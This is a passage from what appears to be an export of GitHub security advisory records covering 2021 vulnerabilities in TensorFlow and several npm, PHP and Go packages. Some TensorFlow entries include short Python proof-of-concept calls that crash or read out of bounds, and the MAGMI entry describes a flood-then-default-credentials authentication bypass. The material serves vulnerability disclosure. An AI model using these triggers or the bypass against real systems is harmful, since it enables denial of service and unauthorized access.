[{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-vq2r-5xvm-3hc3'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29581'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/b1b323042264740c398140da32e93fb9c2c9f33e'}]","{'cwe_ids': ['CWE-908'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T17:50:50Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-wq7q-5v6j-xfv6,2022-07-05T17:39:33Z,2021-05-07T16:06:11Z,,['CVE-2021-23378'],Command Injection in picotts,"This affects all versions up to and including version 0.1.1 of package picotts. If attacker-controlled user input is given to the say function, it is possible for an attacker to execute arbitrary commands. This is due to use of the child_process exec function without input sanitization.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'picotts'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.1.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23378'}, {'type': 'PACKAGE', 'url': 'https://github.com/luisivan/node-picotts'}, {'type': 'WEB', 'url': 'https://github.com/luisivan/node-picotts/blob/8c6b183b884890c8e9422f93036b374942398c8b/index.js#23L16'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-PICOTTS-1078539'}]","{'cwe_ids': ['CWE-77'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-06T22:36:14Z', 'nvd_published_at': '2021-04-18T19:15:00Z'}" +1.4.0,GHSA-4278-2v5v-65r4,2021-05-18T23:43:26Z,2021-05-21T14:20:40Z,,['CVE-2021-29512'],Heap buffer overflow in `RaggedBinCount`,"### Impact +If the `splits` argument of `RaggedBincount` does not specify a valid [`SparseTensor`](https://www.tensorflow.org/api_docs/python/tf/sparse/SparseTensor), then an attacker can trigger a heap buffer overflow: + +```python +import tensorflow as tf +tf.raw_ops.RaggedBincount(splits=[0], values=[1,1,1,1,1], size=5, weights=[1,2,3,4], binary_output=False) +``` + +This will cause a read from outside the bounds of the `splits` tensor buffer in the [implementation of the `RaggedBincount` op](https://github.com/tensorflow/tensorflow/blob/8b677d79167799f71c42fd3fa074476e0295413a/tensorflow/core/kernels/bincount_op.cc#L430-L433): + +```cc + for (int idx = 0; idx < num_values; ++idx) { + while (idx >= splits(batch_idx)) { + batch_idx++; + } + ... + } +``` + +Before the `for` loop, `batch_idx` is set to 0. The user controls the `splits` array, making it contain only one element, 0. Thus, the code in the `while` loop would increment `batch_idx` and then try to read `splits(1)`, which is outside of bounds. + +### Patches +We have patched the issue in GitHub commit [eebb96c2830d48597d055d247c0e9aebaea94cd5](https://github.com/tensorflow/tensorflow/commit/eebb96c2830d48597d055d247c0e9aebaea94cd5). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2 and TensorFlow 2.3.3, as these are also affected. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-4278-2v5v-65r4'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29512'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/eebb96c2830d48597d055d247c0e9aebaea94cd5'}]","{'cwe_ids': ['CWE-120', 'CWE-787'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T23:43:26Z', 'nvd_published_at': '2021-05-14T19:15:00Z'}" +1.4.0,GHSA-v3px-6cc8-f8j3,2021-05-07T15:07:41Z,2021-05-07T15:56:19Z,,['CVE-2020-8214'],Path traversal in servey,A path traversal vulnerability in servey versions prior to 3.3.2 allows an attacker to read content of any arbitrary file.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'servey'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-8214'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/355501'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-07T15:07:41Z', 'nvd_published_at': '2020-07-20T16:15:00Z'}" +1.4.0,GHSA-g475-pch5-6wvv,2021-05-05T19:06:27Z,2021-05-06T18:54:35Z,,['CVE-2020-5777'],Authentication bypass in MAGMI,"MAGMI versions prior to 0.7.24 are vulnerable to a remote authentication bypass due to allowing default credentials in the event there is a database connection failure. A remote attacker can trigger this connection failure if the Mysql setting max_connections (default 151) is lower than Apache (or another web server) setting MaxRequestWorkers (formerly MaxClients) (default 256). This can be done by sending at least 151 simultaneous requests to the Magento website to trigger a ""Too many connections"" error, then use default magmi:magmi basic authentication to remotely bypass authentication.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'dweeves/magmi'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.7.24'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-5777'}, {'type': 'WEB', 'url': 'https://github.com/dweeves/magmi-git/commit/dde71de5cfd505fe78e5caf21d6531b61450a16f'}, {'type': 'WEB', 'url': 'https://www.tenable.com/security/research/tra-2020-51'}]","{'cwe_ids': ['CWE-287'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-05T19:06:27Z', 'nvd_published_at': '2020-09-01T21:15:00Z'}" +1.4.0,GHSA-7vm7-j8p7-h346,2021-05-04T22:31:46Z,2021-05-06T18:27:55Z,,['CVE-2020-8137'],Code injection in blamer,Code injection vulnerability in blamer 1.0.0 and earlier may result in remote code execution when the input can be controlled by an attacker.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'blamer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.0.0'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-8137'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/772448'}]","{'cwe_ids': ['CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-04T22:31:46Z', 'nvd_published_at': '2020-03-20T19:15:00Z'}" +1.4.0,GHSA-9829-jj5p-j6hf,2021-05-05T17:39:52Z,2021-05-06T18:26:30Z,,['CVE-2020-7725'],Prototype Pollution in worksmith,All versions up to and including 1.0.0 of the package worksmith are vulnerable to Prototype Pollution via the setValue function.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'worksmith'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7725'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-WORKSMITH-598798'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-05T17:39:52Z', 'nvd_published_at': '2020-09-01T10:15:00Z'}" +1.4.0,GHSA-h4pc-gx2w-f2xv,2021-05-17T22:25:07Z,2021-05-21T14:28:24Z,,['CVE-2021-29606'],Heap OOB read in TFLite,"### Impact +A specially crafted TFLite model could trigger an OOB read on heap in the TFLite implementation of [`Split_V`](https://github.com/tensorflow/tensorflow/blob/c59c37e7b2d563967da813fa50fe20b21f4da683/tensorflow/lite/kernels/split_v.cc#L99): + +```cc +const int input_size = SizeOfDimension(input, axis_value); +``` + +If `axis_value` is not a value between 0 and `NumDimensions(input)`, then the [`SizeOfDimension` function](https://github.com/tensorflow/tensorflow/blob/102b211d892f3abc14f845a72047809b39cc65ab/tensorflow/lite/kernels/kernel_util.h#L148-L150) will access data outside the bounds of the tensor shape array: + +```cc +inline int SizeOfDimension(const TfLiteTensor* t, int dim) { + return t->dims->data[dim]; +} +``` + +### Patches +We have patched the issue in GitHub commit [ae2daeb45abfe2c6dda539cf8d0d6f653d3ef412](https://github.com/tensorflow/tensorflow/commit/ae2daeb45abfe2c6dda539cf8d0d6f653d3ef412). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-h4pc-gx2w-f2xv'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29606'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/ae2daeb45abfe2c6dda539cf8d0d6f653d3ef412'}]","{'cwe_ids': ['CWE-125'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-17T22:25:07Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-4cx9-7xqc-2jxm,2021-05-05T22:12:14Z,2021-05-06T18:54:48Z,,['CVE-2020-13278'],Reflected cross-site scripting in francoisjacquet/rosariosis,Reflected Cross-Site Scripting vulnerability in Modules.php in RosarioSIS Student Information System < 6.5.1 allows remote attackers to execute arbitrary web script via embedding javascript or HTML tags in a GET request.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'francoisjacquet/rosariosis'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.5.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-13278'}, {'type': 'WEB', 'url': 'https://gitlab.com/francoisjacquet/rosariosis/-/commit/9cb4fec5fe177f1d3716708b46d1958eac477ebe'}, {'type': 'WEB', 'url': 'https://gitlab.com/francoisjacquet/rosariosis/-/issues/282'}, {'type': 'WEB', 'url': 'https://gitlab.com/gitlab-org/cves/-/blob/master/2020/CVE-2020-13278.json'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-05T22:12:14Z', 'nvd_published_at': '2020-08-12T14:15:00Z'}" +1.4.0,GHSA-w8f3-pvx4-4c3h,2022-12-03T04:07:10Z,2021-05-06T18:11:39Z,,['CVE-2020-7713'],Prototype Pollution in arr-flatten-unflatten,All versions of package arr-flatten-unflatten up to and including version 1.1.4 are vulnerable to Prototype Pollution via the constructor.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'arr-flatten-unflatten'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.1.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7713'}, {'type': 'WEB', 'url': 'https://github.com/Quernest/arr-flatten-unflatten/pull/8'}, {'type': 'WEB', 'url': 'https://github.com/Quernest/arr-flatten-unflatten/commit/cb4351c75f87a4fbec3b6140c40ee2993f574372'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-ARRFLATTENUNFLATTEN-598396'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-05T19:00:34Z', 'nvd_published_at': '2020-09-01T09:15:00Z'}" +1.4.0,GHSA-6vwx-mwp8-fh44,2021-04-20T22:02:07Z,2021-05-10T18:47:10Z,,['CVE-2020-8127'],Cross-site Scripting in reveal.js,Insufficient validation in cross-origin communication (postMessage) in reveal.js version 3.9.1 and earlier allow attackers to perform cross-site scripting attacks.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'reveal.js'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.9.2'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.9.1'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-8127'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/691977'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-20T22:02:07Z', 'nvd_published_at': '2020-02-28T20:15:00Z'}" +1.4.0,GHSA-p3hc-fv2j-rp68,2021-05-07T17:34:38Z,2021-05-10T15:36:30Z,,['CVE-2021-23370'],Prototype Pollution in swiper,Versions of the package swiper before 6.5.1 are susceptible to prototype pollution.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'swiper'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.5.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23370'}, {'type': 'WEB', 'url': 'https://github.com/nolimits4web/Swiper/commit/ec358deab79a8cd2529465f07a0ead5dbcc264ad'}, {'type': 'WEB', 'url': 'https://github.com/nolimits4web/swiper/commit/9dad2739b7474f383474773d5ab898a0c29ac178'}, {'type': 'WEB', 'url': 'https://github.com/nolimits4web/swiper/blob/master/CHANGELOG.md#651-2021-03-29'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARS-1244698'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-1244699'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBNOLIMITS4WEB-1244697'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1244696'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-SWIPER-1088062'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-07T17:34:38Z', 'nvd_published_at': '2021-04-12T14:15:00Z'}" +1.4.0,GHSA-9h63-7qf6-mv6r,2021-05-07T22:01:02Z,2021-05-18T18:33:12Z,,['CVE-2021-20188'],Improper Authorization in github.com/containers/libpod,"A flaw was found in podman before 1.7.0. File permissions for non-root users running in a privileged container are not correctly checked. This flaw can be abused by a low-privileged user inside the container to access any other file in the container, even if owned by the root user inside the container. It does not allow to directly escape the container, though being a privileged container means that a lot of security features are disabled when running the container. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/containers/libpod'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.7.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-20188'}, {'type': 'WEB', 'url': 'https://github.com/containers/podman/commit/2c7b579fe7328dc6db48bdaf60d0ddd9136b1e24'}, {'type': 'WEB', 'url': 'https://github.com/containers/podman/commit/c8bd4746151e6ae37d49c4688f2f64e03db429fc'}, {'type': 'WEB', 'url': 'https://github.com/containers/podman/commit/dcf3c742b1ac4d641d66810113f3d17441a412f4'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1915734'}]","{'cwe_ids': ['CWE-863'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-07T22:01:02Z', 'nvd_published_at': None}" +1.4.0,GHSA-3h8m-483j-7xxm,2021-05-18T19:00:06Z,2021-05-21T14:25:22Z,,['CVE-2021-29569'],Heap out of bounds read in `RequantizationRange`,"### Impact +The implementation of `tf.raw_ops.MaxPoolGradWithArgmax` can cause reads outside of bounds of heap allocated data if attacker supplies specially crafted inputs: + +```python +import tensorflow as tf + +input = tf.constant([1], shape=[1], dtype=tf.qint32) +input_max = tf.constant([], dtype=tf.float32) +input_min = tf.constant([], dtype=tf.float32) + +tf.raw_ops.RequantizationRange(input=input, input_min=input_min, input_max=input_max) +``` + +The [implementation](https://github.com/tensorflow/tensorflow/blob/ac328eaa3870491ababc147822cd04e91a790643/tensorflow/core/kernels/requantization_range_op.cc#L49-L50) assumes that the `input_min` and `input_max` tensors have at least one element, as it accesses the first element in two arrays: + +```cc +const float input_min_float = ctx->input(1).flat()(0); +const float input_max_float = ctx->input(2).flat()(0); +``` + +If the tensors are empty, `.flat()` is an empty object, backed by an empty array. Hence, accesing even the 0th element is a read outside the bounds. + +### Patches +We have patched the issue in GitHub commit [ef0c008ee84bad91ec6725ddc42091e19a30cf0e](https://github.com/tensorflow/tensorflow/commit/ef0c008ee84bad91ec6725ddc42091e19a30cf0e). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Ying Wang and Yakun Zhang of Baidu X-Team.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-3h8m-483j-7xxm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29569'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/ef0c008ee84bad91ec6725ddc42091e19a30cf0e'}]","{'cwe_ids': ['CWE-125'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T19:00:06Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-393f-2jr3-cp69,2021-05-18T22:50:31Z,2021-05-21T14:22:21Z,,['CVE-2021-29533'],CHECK-fail in DrawBoundingBoxes,"### Impact +An attacker can trigger a denial of service via a `CHECK` failure by passing an empty image to `tf.raw_ops.DrawBoundingBoxes`: + +```python +import tensorflow as tf + +images = tf.fill([53, 0, 48, 1], 0.) +boxes = tf.fill([53, 31, 4], 0.) +boxes = tf.Variable(boxes) +boxes[0, 0, 0].assign(3.90621) +tf.raw_ops.DrawBoundingBoxes(images=images, boxes=boxes) +``` + +This is because the [implementation](https://github.com/tensorflow/tensorflow/blob/ea34a18dc3f5c8d80a40ccca1404f343b5d55f91/tensorflow/core/kernels/image/draw_bounding_box_op.cc#L148-L165) uses `CHECK_*` assertions instead of `OP_REQUIRES` to validate user controlled inputs. Whereas `OP_REQUIRES` allows returning an error condition back to the user, the `CHECK_*` macros result in a crash if the condition is false, similar to `assert`. + +```cc +const int64 max_box_row_clamp = std::min(max_box_row, height - 1); +... +CHECK_GE(max_box_row_clamp, 0); +``` + +In this case, `height` is 0 from the `images` input. This results in `max_box_row_clamp` being negative and the assertion being falsified, followed by aborting program execution. + +### Patches +We have patched the issue in GitHub commit [b432a38fe0e1b4b904a6c222cbce794c39703e87](https://github.com/tensorflow/tensorflow/commit/b432a38fe0e1b4b904a6c222cbce794c39703e87). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu X-Team.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-393f-2jr3-cp69'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29533'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/b432a38fe0e1b4b904a6c222cbce794c39703e87'}]","{'cwe_ids': ['CWE-754'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T22:50:31Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-3q6f-8grx-pr4v,2023-09-08T19:18:59Z,2021-05-11T16:43:52Z,,['CVE-2020-7691'],Cross-site scripting in jspdf,It's possible to use nested script tags in order to bypass the filtering regex.,"[{'type': 'CVSS_V3', 'score': 